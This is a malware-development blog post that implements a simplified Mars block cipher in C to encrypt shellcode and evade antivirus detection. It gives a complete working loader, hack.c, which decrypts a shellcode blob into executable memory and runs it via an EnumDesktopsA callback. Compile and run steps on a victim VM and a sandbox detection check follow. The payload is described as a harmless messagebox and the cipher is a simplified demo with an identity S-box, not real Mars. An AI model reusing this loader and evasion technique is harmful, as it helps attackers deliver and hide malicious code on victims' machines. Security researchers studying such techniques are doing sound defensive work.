9 minute read

Hello, cybersecurity enthusiasts and white hackers!

cryptography

In this post, I continue my exploration of symmetric-key block ciphers for encrypting and decrypting payloads to evade antivirus (AV) detection. Today I will try to implement Mars cipher.

Mars

Mars is one of those “legendary but niche” block ciphers you only see in CTFs, crypto research, or when someone wants to confuse the hell out of an analyst. Designed by IBM’s top crypto minds in the late 90s, Mars was IBM’s entry into the AES contest - the same race that gave the world Rijndael (what we now know as AES). Unlike most block ciphers of the time, Mars wasn’t content to stick with traditional Feistel networks or pure substitution-permutation networks (SPNs). Instead, it mashed both worlds together, with a touch of mathematical brutality and hardware paranoia.

practical example

Let’s create simple malware with encrypt/decrypt payload via Mars logic.

Mars always operates on 128 bits (16 bytes) at a time. It divides that block into four 32-bit words. So if you feed it this:

unsigned char block[16] = {
  0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41
};

Internally, you get:

uint32_t a, b, c, d;
memcpy(&a, block, 4);
memcpy(&b, block + 4, 4);
memcpy(&c, block + 8, 4);
memcpy(&d, block + 12, 4);

Before any rounds, Mars adds key material to each word - just to scramble the input right away. The key schedule produces a set of round keys (RK[]):

a += RK[0];
b += RK[1];
c += RK[2];
d += RK[3];

This immediately breaks any simple relationship between input and output, a trick modern ciphers call “whitening”.

Next step is the main round operations (the Mars core). Here the block goes through a gauntlet of 32 rounds (in classic Mars; in many demos, the first 8 and last 8 are “mixing”, the 16 in the middle are “cryptographic core”). Every 4 rounds, Mars updates all four state words, using a custom non-linear transformation:

for (int i = 0; i < 32; i += 4) {
  t = ROTL32(a,13) ^ ROTL32(a,23) ^ a; t += RK[i+4];
  b ^= t; b = ROTL32(b,13);

  t = ROTL32(b,13) ^ ROTL32(b,23) ^ b; t += RK[i+5];
  c ^= t; c = ROTL32(c,13);

  t = ROTL32(c,13) ^ ROTL32(c,23) ^ c; t += RK[i+6];
  d ^= t; d = ROTL32(d,13);

  t = ROTL32(d,13) ^ ROTL32(d,23) ^ d; t += RK[i+7];
  a ^= t; a = ROTL32(a,13);
}

This operation uses addition, XOR, and data-dependent rotation - making the process highly non-linear. The S-box comes into play during the key schedule and round key mixing.

After all rounds, Mars applies output whitening (another key-mixing):

a -= RK[36];
b -= RK[37];
c -= RK[38];
d -= RK[39];

Finally, reassemble the block: put the four 32-bit words back into a 16-byte block:

memcpy(block, &a, 4);
memcpy(block+4, &b, 4);
memcpy(block+8, &c, 4);
memcpy(block+12, &d, 4);

So, encryption function looks like this:

void mars_encrypt_block(const uint8_t in[16], uint8_t out[16]) {
  uint32_t a, b, c, d, t;
  memcpy(&a, in, 4); memcpy(&b, in+4, 4); memcpy(&c, in+8, 4); memcpy(&d, in+12, 4);
  a += RK[0]; b += RK[1]; c += RK[2]; d += RK[3];
  for (int i = 0; i < 32; i += 4) {
    t = M(a) + RK[i+4];
    b ^= t; b = ROTL32(b, 13);
    t = M(b) + RK[i+5];
    c ^= t; c = ROTL32(c, 13);
    t = M(c) + RK[i+6];
    d ^= t; d = ROTL32(d, 13);
    t = M(d) + RK[i+7];
    a ^= t; a = ROTL32(a, 13);
  }
  a -= RK[36]; b -= RK[37]; c -= RK[38]; d -= RK[39];
  memcpy(out, &a, 4); memcpy(out+4, &b, 4); memcpy(out+8, &c, 4); memcpy(out+12, &d, 4);
}

What about decryption?

You just run everything in reverse: undo output whitening, invert the core rounds, then undo input whitening. The structure allows for perfect reversibility:

void mars_decrypt_block(const uint8_t in[16], uint8_t out[16]) {
  uint32_t a, b, c, d, t;
  memcpy(&a, in, 4); memcpy(&b, in+4, 4); memcpy(&c, in+8, 4); memcpy(&d, in+12, 4);
  a += RK[36]; b += RK[37]; c += RK[38]; d += RK[39];
  for (int i = 32-4; i >= 0; i -= 4) {
    t = M(d) + RK[i+7];
    a = ROTR32(a, 13) ^ t;
    t = M(c) + RK[i+6];
    d = ROTR32(d, 13) ^ t;
    t = M(b) + RK[i+5];
    c = ROTR32(c, 13) ^ t;
    t = M(a) + RK[i+4];
    b = ROTR32(b, 13) ^ t;
  }
  a -= RK[0]; b -= RK[1]; c -= RK[2]; d -= RK[3];
  memcpy(out, &a, 4); memcpy(out+4, &b, 4); memcpy(out+8, &c, 4); memcpy(out+12, &d, 4);
}

As usually, I used padding logic, for any payload size:

size_t pkcs7_pad(const unsigned char* in, size_t len, unsigned char* out) {
  size_t rem = len % BLOCK_SIZE;
  size_t padlen = BLOCK_SIZE - rem;
  size_t total = len + padlen;
  memcpy(out, in, len);
  for (size_t i = 0; i < padlen; ++i)
    out[len + i] = (unsigned char)padlen;
  return total;
}

size_t pkcs7_unpad(const unsigned char* in, size_t len) {
  if (len == 0) return 0;
  unsigned char pad = in[len-1];
  if (pad > BLOCK_SIZE) return len;
  for (size_t i = 0; i < pad; ++i)
    if (in[len-1-i] != pad) return len;
  return len - pad;
}

How’s this different from Feistel?

In classic Feistel ciphers (like DES), you split the block into two halves and process one half with the round function, then swap. In Mars, you work with all four words at once, and the operations aren’t just Feistel swaps—they mix, rotate, add, and XOR everything in sight, so the diffusion is way stronger and the structure is less predictable.

Full source code (Mars with PKCS#7) looks like this hack.c:

/*
* hack.c
* encrypt/decrypt payload 
* with padding via Mars
* author: @cocomelonc
* https://cocomelonc.github.io/malware/2025/07/16/malware-cryptography-43.html
*/
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define BLOCK_SIZE 16
#define KEY_SIZE 16   // 128 bits
#define MARS_ROUNDS 32

// simple S-box: S[i] = i (not secure, for PoC/demo only)
static const uint32_t S[512] = {
  0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10,11,12,13,14,15,
  16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,
  32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,
  48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,
  64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,
  80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,
  96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,
  112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,
  128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,
  144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,
  160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,
  176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,
  192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,
  208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,
  224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,
  240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,
  256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,
  272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,
  288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,
  304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,
  320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,
  336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,
  352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,
  368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,
  384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,
  400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,
  416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,
  432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,
  448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,
  464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,
  480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,
  496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511
};

// Mars key schedule
static uint32_t RK[40];

#define ROTL32(x,n) (((x) << (n)) | ((x) >> (32-(n))))
#define ROTR32(x,n) (((x) >> (n)) | ((x) << (32-(n))))

void mars_key_schedule(const uint8_t userkey[KEY_SIZE]) {
  uint32_t T[15];
  int i;
  for (i = 0; i < 4; ++i) {
    T[i] = ((uint32_t)userkey[4*i]) | ((uint32_t)userkey[4*i+1] << 8) |
         ((uint32_t)userkey[4*i+2] << 16) | ((uint32_t)userkey[4*i+3] << 24);
  }
  for (; i < 15; ++i) T[i] = 0;
  for (i = 0; i < 40; ++i) {
    RK[i] = S[(T[(i+0)%15] ^ T[(i+1)%15] ^ T[(i+8)%15] ^ T[(i+12)%15] ^ i) & 0x1FF];
  }
}
#define M(x) (ROTL32(x, 13) ^ ROTL32(x, 23) ^ (x))

void mars_encrypt_block(const uint8_t in[16], uint8_t out[16]) {
  uint32_t a, b, c, d, t;
  memcpy(&a, in, 4); memcpy(&b, in+4, 4); memcpy(&c, in+8, 4); memcpy(&d, in+12, 4);
  a += RK[0]; b += RK[1]; c += RK[2]; d += RK[3];
  for (int i = 0; i < 32; i += 4) {
    t = M(a) + RK[i+4];
    b ^= t; b = ROTL32(b, 13);
    t = M(b) + RK[i+5];
    c ^= t; c = ROTL32(c, 13);
    t = M(c) + RK[i+6];
    d ^= t; d = ROTL32(d, 13);
    t = M(d) + RK[i+7];
    a ^= t; a = ROTL32(a, 13);
  }
  a -= RK[36]; b -= RK[37]; c -= RK[38]; d -= RK[39];
  memcpy(out, &a, 4); memcpy(out+4, &b, 4); memcpy(out+8, &c, 4); memcpy(out+12, &d, 4);
}

void mars_decrypt_block(const uint8_t in[16], uint8_t out[16]) {
  uint32_t a, b, c, d, t;
  memcpy(&a, in, 4); memcpy(&b, in+4, 4); memcpy(&c, in+8, 4); memcpy(&d, in+12, 4);
  a += RK[36]; b += RK[37]; c += RK[38]; d += RK[39];
  for (int i = 32-4; i >= 0; i -= 4) {
    t = M(d) + RK[i+7];
    a = ROTR32(a, 13) ^ t;
    t = M(c) + RK[i+6];
    d = ROTR32(d, 13) ^ t;
    t = M(b) + RK[i+5];
    c = ROTR32(c, 13) ^ t;
    t = M(a) + RK[i+4];
    b = ROTR32(b, 13) ^ t;
  }
  a -= RK[0]; b -= RK[1]; c -= RK[2]; d -= RK[3];
  memcpy(out, &a, 4); memcpy(out+4, &b, 4); memcpy(out+8, &c, 4); memcpy(out+12, &d, 4);
}

size_t pkcs7_pad(const unsigned char* in, size_t len, unsigned char* out) {
  size_t rem = len % BLOCK_SIZE;
  size_t padlen = BLOCK_SIZE - rem;
  size_t total = len + padlen;
  memcpy(out, in, len);
  for (size_t i = 0; i < padlen; ++i)
    out[len + i] = (unsigned char)padlen;
  return total;
}

size_t pkcs7_unpad(const unsigned char* in, size_t len) {
  if (len == 0) return 0;
  unsigned char pad = in[len-1];
  if (pad > BLOCK_SIZE) return len;
  for (size_t i = 0; i < pad; ++i)
    if (in[len-1-i] != pad) return len;
  return len - pad;
}

int main() {
  uint8_t key[KEY_SIZE] = {
    0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77,
    0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77
  };

  unsigned char payload[] = {
    0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,
    0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,
    0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0x0f,0xb7,0x4a,
    0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,
    0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,
    0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,
    0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,
    0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,
    0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,
    0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,
    0x40,0x24,0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,
    0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
    0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,
    0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,
    0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,
    0x85,0x25,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,
    0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,
    0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
    0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x4d,0x65,0x6f,0x77,0x2d,0x6d,0x65,0x6f,0x77,
    0x21,0x00,0x3d,0x5e,0x2e,0x2e,0x5e,0x3d,0x00
  };
  size_t payload_len = sizeof(payload);

  uint8_t key_schedule[KEY_SIZE];
  memcpy(key_schedule, key, KEY_SIZE);
  mars_key_schedule(key_schedule);

  size_t padded_len = ((payload_len + BLOCK_SIZE - 1) / BLOCK_SIZE) * BLOCK_SIZE;
  unsigned char *padded = calloc(1, padded_len);
  unsigned char *encrypted = calloc(1, padded_len);
  unsigned char *decrypted = calloc(1, padded_len);

  size_t used = pkcs7_pad(payload, payload_len, padded);

  for (size_t i = 0; i < used; i += BLOCK_SIZE)
    mars_encrypt_block(padded + i, encrypted + i);

  for (size_t i = 0; i < used; i += BLOCK_SIZE)
    mars_decrypt_block(encrypted + i, decrypted + i);

  size_t unpadded = pkcs7_unpad(decrypted, used);

  printf("original:\n");
  for (size_t i = 0; i < payload_len; i++) printf("%02x ", payload[i]);
  printf("\n");

  printf("encrypted:\n");
  for (size_t i = 0; i < used; i++) printf("%02x ", encrypted[i]);
  printf("\n");

  printf("decrypted:\n");
  for (size_t i = 0; i < unpadded; i++) printf("%02x ", decrypted[i]);
  printf("\n");

  LPVOID mem = VirtualAlloc(NULL, unpadded, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  RtlMoveMemory(mem, decrypted, unpadded);
  EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, (LPARAM)NULL);

  free(padded); free(encrypted); free(decrypted);
  return 0;
}

As you can see, as usual, I used meow-meow messagebox payload for encryption:

unsigned char payload[] = {
  0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,
  0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,
  0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0x0f,0xb7,0x4a,
  0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,
  0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,
  0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,
  0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,
  0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,
  0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,
  0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,
  0x40,0x24,0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,
  0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
  0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,
  0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,
  0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,
  0x85,0x25,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,
  0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,
  0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
  0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x4d,0x65,0x6f,0x77,0x2d,0x6d,0x65,0x6f,0x77,
  0x21,0x00,0x3d,0x5e,0x2e,0x2e,0x5e,0x3d,0x00
  };

demo

Let’s go to see everything in action. Compile it:

x86_64-w64-mingw32-gcc hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

malware

Then run it on my victim’s machine Windows 10 VM:

.\hack.exe

malware

malware

malware

malware

As you can see, everything is worked perfectly! =^..^=

Let’s upload this to ANY.RUN:

malware

malware

IoC:

malware

https://app.any.run/tasks/1fbcb806-6656-4c41-8a9d-3eb19a8d781a

As you can see, ANY.RUN says that it is not malicious, but I think this is due to the fact that the payload is harmless, just meow-meow messagebox.

Shannon entropy:

python3 entropy.py -f hack.exe

malware

As you can see, entropy of .text section is 6.240499.

malware

Thanks to ANY.RUN for API!

Mars never got to be the AES winner (that prize went to Rijndael), but it’s still respected for its forward-looking design. It’s not commonly found in mainstream crypto stacks, and that’s exactly why you sometimes see it in advanced malware or CTF challenges

I hope this post spreads awareness to the blue teamers of this interesting encrypting technique, and adds a weapon to the red teamers arsenal and C/C++ programmers.

run shellcode via EnumDesktopsA
Malware and cryptography 1
ANY.RUN
ANY.RUN: hack.exe
source code in github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine